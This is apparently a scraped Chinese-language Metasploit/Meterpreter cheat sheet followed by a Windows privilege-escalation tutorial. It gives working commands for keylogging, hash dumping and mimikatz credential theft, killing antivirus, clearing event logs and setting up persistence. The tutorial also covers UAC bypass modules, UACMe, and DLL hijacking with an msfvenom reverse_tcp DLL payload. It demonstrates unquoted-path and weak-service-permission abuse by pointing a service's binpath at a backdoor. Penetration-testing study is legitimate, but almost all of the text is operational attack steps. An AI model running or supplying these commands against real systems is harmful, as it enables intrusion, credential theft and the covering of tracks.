解決msfshell亂碼
chcp 65001
1chcp 65001
加載模塊 use name 查看網絡配置 ifconfig 獲取進程列表 ps 查看所有exploit show exploits 查看所有payload show payloads 查看所有auxiliary show auxiliary 展示模塊詳細信息 info 查找模塊 search name 查看當前運行的模塊 jobs 重啟目標機器 reboot 關閉目標機器 shutdown 獲取交互shell shell 當前meterpreter到后臺 background 離開msf quit
x
1加載模塊
2use name
3
4查看網絡配置
5ifconfig
6
7獲取進程列表
8ps
9
10查看所有exploit
11show exploits
12
13查看所有payload
14show payloads
15
16查看所有auxiliary
17show auxiliary
18
19展示模塊詳細信息
20info
21
22查找模塊
23search name
24
25查看當前運行的模塊
26jobs
27
28重啟目標機器
29reboot
30
31關閉目標機器
32shutdown
33
34獲取交互shell
35shell
36
37當前meterpreter到后臺
38background
39
40離開msf
41quit
(1)系統(tǒng)信息獲取
(2)密碼哈希導出
(3)文件上傳下載
(4)屏幕截取
(5)鍵盤記錄
(6)權限提升
(7)跳板攻擊
(8)反追蹤
優(yōu)點: 純內存工作模式,執(zhí)行漏洞滲透攻擊的時候會直接裝載meterpreter的 動態(tài)鏈接庫到目標進程的空間中,使得meterpreter啟動隱蔽,很難被殺毒軟 件檢測到;
1.基本命令
background # 讓meterpreter處于后臺模式 sessions -i index # 與會話進行交互,index表示第一個session quit # 退出會話 shell # 獲得控制臺權限 irb # 開啟ruby終端 2.文件操作命令 cat # 查看文件內容 getwd # 查看當前工作目錄 upload # 上傳文件到目標機上 download # 下載文件到本機上
19
1background # 讓meterpreter處于后臺模式
2
3sessions -i index # 與會話進行交互,index表示第一個session
4
5quit # 退出會話
6
7shell # 獲得控制臺權限
8
9irb # 開啟ruby終端
10
112.文件操作命令
12
13cat # 查看文件內容
14
15getwd # 查看當前工作目錄
16
17upload # 上傳文件到目標機上
18
19download # 下載文件到本機上
來源: https://cloud.tencent.com/developer/article/1472206
portfwd add -l 6666 -p 3389 -r 127.0.0.1
Socks4a代理
use auxiliary/server/socks4a set srvhost 127.0.0.1 set srvport 1080 run
4
1use auxiliary/server/socks4a
2set srvhost 127.0.0.1
3set srvport 1080
4run
Socks5代理
use auxiliary/server/socks5 set USERNAME root set PASSWORD Password@ run
4
1use auxiliary/server/socks5
2set USERNAME root
3set PASSWORD Password@
4run
獲取網段信息 run get_local_subnets 查看幫助 run autoroute –h 添加到目標環(huán)境網絡 run autoroute -s 192.168.0.1/24 打印添加的路由 run autoroute –p 刪除路由 run autoroute -d -s 192.168.0.1/24
1獲取網段信息
2run get_local_subnets
3
4查看幫助
5run autoroute –h
6
7添加到目標環(huán)境網絡
8run autoroute -s 192.168.0.1/24
9
10打印添加的路由
11run autoroute –p
12
13刪除路由
14run autoroute -d -s 192.168.0.1/24
在目標機中執(zhí)行文件 execute
創(chuàng)建新進程cmd.exe,-H不可見,-i交互 execute -H -i -f cmd.exe
-f:指定可執(zhí)行文件 -H:創(chuàng)建一個隱藏進程 -a:傳遞給命令的參數(shù) -i:跟進程進行交互 -m:從內存中執(zhí)行 -t: 使用當前偽造的線程令牌運行進程 -s: 在給定會話中執(zhí)行進程
13
1-f:指定可執(zhí)行文件
2
3-H:創(chuàng)建一個隱藏進程
4
5-a:傳遞給命令的參數(shù)
6
7-i:跟進程進行交互
8
9-m:從內存中執(zhí)行
10
11-t: 使用當前偽造的線程令牌運行進程
12
13-s: 在給定會話中執(zhí)行進程
獲取當前進程PID getpid 獲取進程列表 ps 轉移進程 migrate PID 殺死進程 kill PID 自動進程遷移 run post/windows/manage/migrate 監(jiān)聽設置自動轉移進程 set autorunscript migrate -f
1獲取當前進程PID
2getpid
3
4獲取進程列表
5ps
6
7轉移進程
8migrate PID
9
10殺死進程
11kill PID
12
13自動進程遷移
14run post/windows/manage/migrate
15
16監(jiān)聽設置自動轉移進程
17set autorunscript migrate -f
使用模塊 use incognito 查看可用token list_tokens -u 假冒SYSTEM權限 impersonate_token 'NT AUTHORITY\SYSTEM' 利用假冒身份執(zhí)行命令 execute -f cmd.exe -i –t 或者直接shell即可 返回原始權限 rev2self
x
1使用模塊
2use incognito
3
4查看可用token
5list_tokens -u
6
7假冒SYSTEM權限
8impersonate_token 'NT AUTHORITY\SYSTEM'
9
10利用假冒身份執(zhí)行命令
11execute -f cmd.exe -i –t
12或者直接shell即可
13
14返回原始權限
15rev2self
加載特權提升擴展模塊 use priv 獲取更多的特權 getprivs 查看補丁信息 run post/windows/gather/enum_patches 可利用exp提權檢測 use post/multi/recon/local_exploit_suggester 系統(tǒng)服務權限配置錯誤 use exploit/windows/local/service_permissions 注冊表鍵配置錯誤提取 use exploit/windows/local/always_install_elevated 可信任服務路徑 use exploit/windows/local/trusted_service_path
1加載特權提升擴展模塊
2use priv
3
4獲取更多的特權
5getprivs
6
7查看補丁信息
8run post/windows/gather/enum_patches
9
10可利用exp提權檢測
11use post/multi/recon/local_exploit_suggester
12
13系統(tǒng)服務權限配置錯誤
14use exploit/windows/local/service_permissions
15
16注冊表鍵配置錯誤提取
17use exploit/windows/local/always_install_elevated
18
19可信任服務路徑
20use exploit/windows/local/trusted_service_path
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
禁用鼠標 uictl disable mouse
禁用鍵盤 uictl disable keyboard
啟用鼠標 uictl enable mouse
啟用鍵盤 uictl enable keyboard
鍵盤記錄
開始鍵盤記錄 keyscan_start 導出記錄數(shù)據(jù) keyscan_dump 結束鍵盤記錄 keyscan_stop
8
1開始鍵盤記錄
2keyscan_start
3
4導出記錄數(shù)據(jù)
5keyscan_dump
6
7結束鍵盤記錄
8keyscan_stop
查看當前目錄 pwd getwd 查看目標主機信息 sysinfo 檢查目標機器閑置時間 idletime 獲取代理信息 getproxy 查看目標主機是否運行在虛擬機上 run checkvm run post/windows/gather/checkvm 獲取主機安裝軟件、補丁 run post/windows/gather/enum_applications run post/windows/gather/enum_patches #補丁信息 獲取目標主機環(huán)境變量 run post/multi/gather/env 獲取IE緩存 run post/windows/gather/enum_ie 獲取Chrome緩存 run post/windows/gather/enum_chrome 獲取Firefox緩存 run post/windows/gather/enum_firefox 列舉當前登錄的用戶 run post/windows/gather/enum_logged_on_users 查找域控 run post/windows/gather/enum_domain Windows憑證搜索 run post/windows/gather/enum_unattend 獲取辦公文檔 run post/windows/gather/dumplinks 獲取目標常見信息并保存到本地 run scraper 屏幕截圖 screenshot
1查看當前目錄
2pwd
3getwd
4
5查看目標主機信息
6sysinfo
7
8檢查目標機器閑置時間
9idletime
10
11獲取代理信息
12getproxy
13
14查看目標主機是否運行在虛擬機上
15run checkvm
16run post/windows/gather/checkvm
17
18獲取主機安裝軟件、補丁
19run post/windows/gather/enum_applications
20run post/windows/gather/enum_patches #補丁信息
21
22獲取目標主機環(huán)境變量
23run post/multi/gather/env
24
25獲取IE緩存
26run post/windows/gather/enum_ie
27
28獲取Chrome緩存
29run post/windows/gather/enum_chrome
30
31獲取Firefox緩存
32run post/windows/gather/enum_firefox
33
34列舉當前登錄的用戶
35run post/windows/gather/enum_logged_on_users
36
37查找域控
38run post/windows/gather/enum_domain
39
40Windows憑證搜索
41run post/windows/gather/enum_unattend
42
43獲取辦公文檔
44run post/windows/gather/dumplinks
45
46獲取目標常見信息并保存到本地
47run scraper
48
49屏幕截圖
50screenshot
抓取自動登錄的用戶名和密碼 run post/windows/gather/credentials/windows_autologin
hashdump run post/windows/gather/smart_hashdump
加載 load mimikatz
獲取hash值 msv
獲取明文 Kerberos
獲取系統(tǒng)賬戶信息 wdigest
mimikatz_command -f samdump::hashes #執(zhí)行mimikatz原始命令 mimikatz_command -f sekurlsa::searchPasswords
1mimikatz_command -f samdump::hashes #執(zhí)行mimikatz原始命令
2mimikatz_command -f sekurlsa::searchPasswords
meterpreter > load mimikatz #加載mimikatz meterpreter > msv #獲取hash值 meterpreter > Kerberos #獲取明文 meterpreter > ssp #獲取明文信息 meterpreter > wdigest #獲取系統(tǒng)賬戶信息 meterpreter > mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示 meterpreter > mimikatz_command -f hash:: #獲取目標 hash meterpreter > mimikatz_command -f samdump::hashes meterpreter > mimikatz_command -f sekurlsa::searchPasswords
x
1meterpreter > load mimikatz #加載mimikatz
2
3meterpreter > msv #獲取hash值
4
5meterpreter > Kerberos #獲取明文
6
7meterpreter > ssp #獲取明文信息
8
9meterpreter > wdigest #獲取系統(tǒng)賬戶信息
10
11meterpreter > mimikatz_command -f a:: #必須要以錯誤的模塊來讓正確的模塊顯示
12
13meterpreter > mimikatz_command -f hash:: #獲取目標 hash
14
15meterpreter > mimikatz_command -f samdump::hashes
16
17meterpreter > mimikatz_command -f sekurlsa::searchPasswords
查看網卡信息 run packetrecorder -L
查看流量 run packetrecorder -i <網卡ID>
使用arp發(fā)現(xiàn)主機 run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
掃描tcp端口 run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389
關閉殺軟 run killav
查看防火墻狀態(tài) run getcountermeasure
在shell中使用 netsh firewall show opmode
2
1在shell中使用
2netsh firewall show opmode
use exploit/windows/smb/psexec
查看攝像頭信息 webcam_list
使用攝像頭拍照 webcam_snap
屏幕監(jiān)視 run vnc
開啟遠程桌面 run post/windows/manage/enable_rdp
添加用戶 run post/windows/manage/enable_rdp USERNAME=gugugu PASSWORD=Root123456789
將3389端口轉發(fā)到6662端口 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
查看全部會話 sessions
選擇會話1 sessions 1
升級meterpreter sessions -u 會話id
run persistence -X -i 50 -p 4444 -r 192.168.1.7
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.109.137 set LPORT 4444 exploit
5
1use exploit/multi/handler
2set payload windows/meterpreter/reverse_tcp
3set LHOST 192.168.109.137
4set LPORT 4444
5exploit
run metsvc
目標主機保存的ssh身份驗證信息 run post/multi/gather/ssh_creds
刪除添加的賬號 C:\Windows\system32> net user 添加的用戶名 /del
刪除日志 clearev
關閉所有session連接 sessions -K
事件日志
查看事件日志 run event_manager -i 清除事件日志 run event_manager -c
??關于Windows提權應該這篇總結完就結束了,再次提醒一下關于第三方軟件或插件提權,不是不寫,而且有些軟件都會自動更新,很多漏洞基本上很少遇到,同時也利用不了,比如說:向日葵有一個版本能夠提權,但是現(xiàn)在那個版本裝再電腦上,根本連接不上向日葵的服務器,更何談提權呢,同時還可以看日志,目前日志也更改了,端口不會再日志中出現(xiàn)了。
??前面幾篇文章我就匯總在下面了,同時關于UAC提權之前一篇文章寫的沒那么細,這里重新補充一下。
??Windows權限提升—令牌竊取、UAC提權、進程注入等提權
??Windows權限提升 —SQL Server/MSSQL數(shù)據(jù)庫提權
??Windows權限提升—MySQL數(shù)據(jù)庫提權
??Windows權限提升—溢出提權
??UAC(User Account Control,用戶賬號控制)是微軟為了提高系統(tǒng)安全性在Windows Vista中引入的技術。UAC要求用戶在執(zhí)行可能影響計算機運行的操作或在進行可能影響其他用戶的設置之前,擁有相應的權限或者管理員密碼。UAC在操作啟動前對用戶身份進行驗證,以避免惡意軟件和間諜軟件在未經許可的情況下在計算機上進行安裝操作或者對計算機設置進行更改。
??在Windows Vista及以后的版本中,微軟設置了安全控制策略,分為高、中、低三個等級。高等級的進程有管理員權限;中等級的進程有普通用戶權限;低等級的進程,權限是有限的,以保證系統(tǒng)在受到安全威脅時造成的損害最小。在權限不夠的情況下,訪問系統(tǒng)磁盤的根目錄、Windows目錄,以及讀寫系統(tǒng)登錄數(shù)據(jù)庫等操作,都需要經常UAC(User Account Control,用戶賬號控制)的認證。
??這里我就不演示如何設置監(jiān)聽與生成木馬了,在前面的文章中都提到相關的操作。
??這里是基于默認等級的哦,如果被設置為最高的話,那就涼涼了,因為需要人為去點擊,但是我們正常需要提權都是由于我們獲取的權限太低,或者遠程桌面打不開,你如何去點擊,都無法點擊了,何談提權。
??這里的UAC狀態(tài)是默認,也就是中等級別,至于打開這個UAC可以在運行框中輸入"msconfig",然后工具一欄就能看到更改UAC設置。
??一般UAC關閉的情況下使用getsystem就能夠提權成功。
??這里在嘗試使用getsystem提權,發(fā)現(xiàn)無法提權,那么就需要使用UAC進行繞過了。
background ##將會話置于后臺,不然會在使用bypass的找不到會話。??這里能夠看到有很多的UAC繞過的bypass方式,但是這里面是分不同Windows版本的,有的可能在Windows7上能用,有的可能就不能用,不過最好選擇日期靠近的,這樣成功率大一點。
search uac ##搜索use exploit/windows/local/bypassuac ##選擇bypass
sessions ##選擇會話
set session 1 ##設定會話
set lport 5555 ##設定反彈端口,這里不設置也可以,但是有時候直接反彈回來,會出現(xiàn)反彈不成功的情況。
run ##執(zhí)行??通過反彈回來的效果能夠看到,成功提權了。
??這里還是使用默認的UAC等級進行提權。
??可以看到,這里同樣是提權失敗。
??這里我也是嘗試了好幾個bypass才成功的,環(huán)境不同,可能使用到的bypass也是不同的,有些bypass需要也能提權,但是需要點擊確定,所以多嘗試嘗試。
use exploit/windows/local/bypassuac_silentcleanup ##選擇模塊
sessions ##選擇會話
set session 5 ##設置會話
set lport 6666 ##設置監(jiān)聽端口
run ##執(zhí)行??這里能夠看到是成功提權了。
??這里我就不搭建WEB環(huán)境了,UACMe提取可以在低權限的時候提權,但是同樣在UAC設置為高的時候同樣也是無法進行直接提權的,需要人為的去點擊確定才可以。
??UACMe工具涵蓋了Windows7-11以及server服務器系統(tǒng)均可以提權。
??同時這里我就演示個Windows10系統(tǒng)的,至于Windows7肯定要比Windows10好提權。
注意想要使用這個工具需要對其進行編譯成功.exe文件,而我這里沒有最新的.exe文件,這里給個老版的,但是也沒差到哪里去,具體使用的介紹建議去GitHub上自己看。
??UACMe:GitCode - 開發(fā)者的代碼家園
??百度網盤UACMe:https://pan.baidu.com/s/1Tt-s2kluGJTr0hGwFR6y7w?pwd=86lm
提取碼:86lm
??這里在下載完UACMe的時候,里面會有兩個exe執(zhí)行文件,一個是32位的,一個是64位的,按照不同的系統(tǒng)位數(shù),放入不同的exe文件進行執(zhí)行。
??注意這里彈出的窗口只是演示,在實際的環(huán)境中,我們無法登錄桌面,可以使用改工具去運行木馬后門,讓其上線即可。
??至于編號,新版的UACMe里包含70余種,可以一個一個嘗試。
語法:Akagi64.exe 編號??這里同樣我們監(jiān)聽一下端口,并且利用工具進行反彈上線。
語法:Akagi64.exe 編號 后門程序地址??這里反彈上來的可能還是普通管理員權限,這里可以使用getsystem進行再次提權,可以看到成功提權。
??Windows 程序啟動的時候需要 DLL。如果這些 DLL 不存在,則可以通過在應用程序要查找的位置放置惡意 DLL 來提權。通常,Windows 應用程序有其預定義好的搜索 DLL 的路徑。
??它會根據(jù)下面的順序進行搜索:
1、應用程序加載的目錄
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、當前工作目錄 Current Working Directory,CWD
6、在 PATH 環(huán)境變量的目錄(先系統(tǒng)后用戶)??程序運行一般會加載系統(tǒng)dll或本身程序自帶的dll,如果我們將程序執(zhí)行時需要加載的dll文件替換成程序,那么我們下次在啟動程序時所加載的dll就是我們替換的那個木馬程序了。
??這里會出現(xiàn)一個問題,沒有遠程桌面我們如何收集,這里其實有個很簡單的辦法就是,通過上線普通木馬后,看看能不能查看有存在哪些服務,然后找到相關服務本地安裝,安裝后使用火絨劍等工具進行查找加載的dll文件即可。
??像系統(tǒng)文件加載的dll我們是動不了的,我們一般能懂的都是未知文件和數(shù)字簽名文件。
??這里我們選中l(wèi)ibeay32.dll文件,我們就制作這個木馬。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20 lport=5566 -f dll >libeay32.dll??這里將生成的dll文件替換原本的dll。
??運行軟件,不過需要注意的是,在實際環(huán)境中由于我未獲取到桌面權限,所以需要等待管理員去運行,同時由于我們替換了dll文件,所以會導致管理員在運行軟件的時候會出現(xiàn)無響應的情況,這時無法保證,管理員會卸載重新安裝。
??這里設置監(jiān)聽,當管理員去運行軟件的時候就會上線,像上面提到的,當軟件不能用了,無法保證管理員不會卸載重裝或者重啟電腦,所以在獲取權限后需要及時的移植到其它進程上面。
??可以看到的是成功上線了。
??我這里沒有提權成功,可能是由于系統(tǒng)問題,但是調試了半天也沒成功,這也能夠證明不是所有提權方式都是能夠百分比提權成功的,這里也只是演示,可以用這個方式進行提權。
??前面的分析與劫持等步驟就不在贅述了,直接看案效果把。
??可以看到這里使用Windows2012就能夠成功提權,所以之前提到的有些提權方式是根據(jù)不同系統(tǒng)可能有不同的效果。
??注意提權方式和操作系統(tǒng)版本等都沒有任何關系。
??當Windows服務運行時,會發(fā)生以下兩種情況之一。如果給出了可執(zhí)行路徑,并且引用了完整路徑,則系統(tǒng)會按字面解釋它并執(zhí)行。但是,如果服務的二進制路徑未包含在引號中,則操作系統(tǒng)將會執(zhí)行找到的空格分隔的服務路徑的第一個實例。
??不過這個確實局限性還是很大的,比如虛擬機中沒有找到這樣的情況,實體機沒有找到,客戶現(xiàn)場機器也沒找到…同時還有一個問題是就算有,很多都是在C盤中,如果基本權限不夠大,那么也涼涼,也用不了。
??這里的圖片我借用一下其它博客的,由于我自己電腦以及其它電腦,虛擬機都沒有這樣的路徑。
次序執(zhí)行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe??而通過下面的語句可以判斷系統(tǒng)中是否存在這類問題,這里找到不代表就一定會存在問題,你看下面的圖片明顯無法進行替換。
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """??這里由于我的虛擬機中并沒有這樣的路徑,而且不好模擬,所以這里主要就是將一下流程,我們就按照第一張圖片上的案例來演示。
c:\program files (x86)\grasssoft\macro expert\MacroService.exe ##獲取到存在問題的路徑??上面是獲取到的錯誤路徑,這里我們可以看到空格是在c:\program后面,那么我們生成一個木馬,然后將木馬名字改為:program.exe,并且發(fā)入C盤的根目錄下。
??這里放入C盤的原因是,服務器進行重啟的時候,會按照上面的路徑去尋找,而第一步就是找到C盤,同時又沒有引號,那么當遇到program.exe的時候就會執(zhí)行。
??這里只需要讓服務重啟就可以了,不過這里同時遇到一個問題就是,當實際環(huán)境中是需要管理員去重啟服務,或者重啟服務器的時候啟動,這樣才能上線,不過一般這個上線就是system權限。
??這里我就不演示了,主要沒有那個條件,整體的流程就是這樣的。
??Windows服務有時被配置為與服務本身或與服務運行的目錄相關的弱權限。這可能允許攻擊者操縱服務,以便在其啟動時執(zhí)行任意代碼,并將權限提升到SYSTEM。
??將服務的 binpath 更改為我們上傳的木馬文件路徑,以便在服務啟動時執(zhí)行惡意代碼從而獲得system權限,這里可以利用accesschk.exe工具輔助實現(xiàn)。
??accesschk是一個windows系統(tǒng)配置檢查工具,用于查看文件、注冊表項、服務、進程、內核對象等的有效權限。該工具將有助于識別當前用戶是否可以修改某個服務目錄中的文件,由于它是微軟官方出品,我們將其上傳至靶機,執(zhí)行不會受到阻礙。
AccessChk - Sysinternals | Microsoft Learn
??這里將下載下來的工具上傳至靶機中,這里我使用Windows server2012做演示。這里我為了測試方便,直接在靶機中去操作,而實際環(huán)境中可能需要在webshell工具中去操作。
??還需要注意的是第一次執(zhí)行accesschk.exe會跳出一個提示窗口讓我們接受許可,我們執(zhí)行命令繞過以自動接受。
accesschk.exe /accepteula??檢測服務權限配置:執(zhí)行命令檢測,檢測當前用戶可以操作的服務項,注意當前用戶操作的服務項,需要先判斷自己獲取到的權限是什么,然后去執(zhí)行。
accesschk.exe -uwcqv "Administrators" *??這里通過修改服務路徑的指向來執(zhí)行后門木馬程序的路徑。
sc config "napagent" binpath="C:Users\Public\Downloads\shell.exe"??注意這里設置完后,需要開啟監(jiān)聽哦,然后重啟服務,但是在實際的環(huán)境中是需要管理員對服務進行重啟,需要等待的。
sc start napagent??我這里沒有像別人一樣反彈回來就是system權限,我又進行提權了一下,把權限提成system,如果能夠配合之前提到檢查哪些服務是system權限進行修改,可能效果會更改,當然也會存在局限性。
??同時也又可能是由于我選錯服務了,演示的時候可以多試試,或者百度搜一下對應的服務,找找相關的資料。
??同時還又一個問題就是,提權完的會話容易掉線,服務啟動不了后,系統(tǒng)再結束啟動后,就會離線,所以需要盡快遷移會話。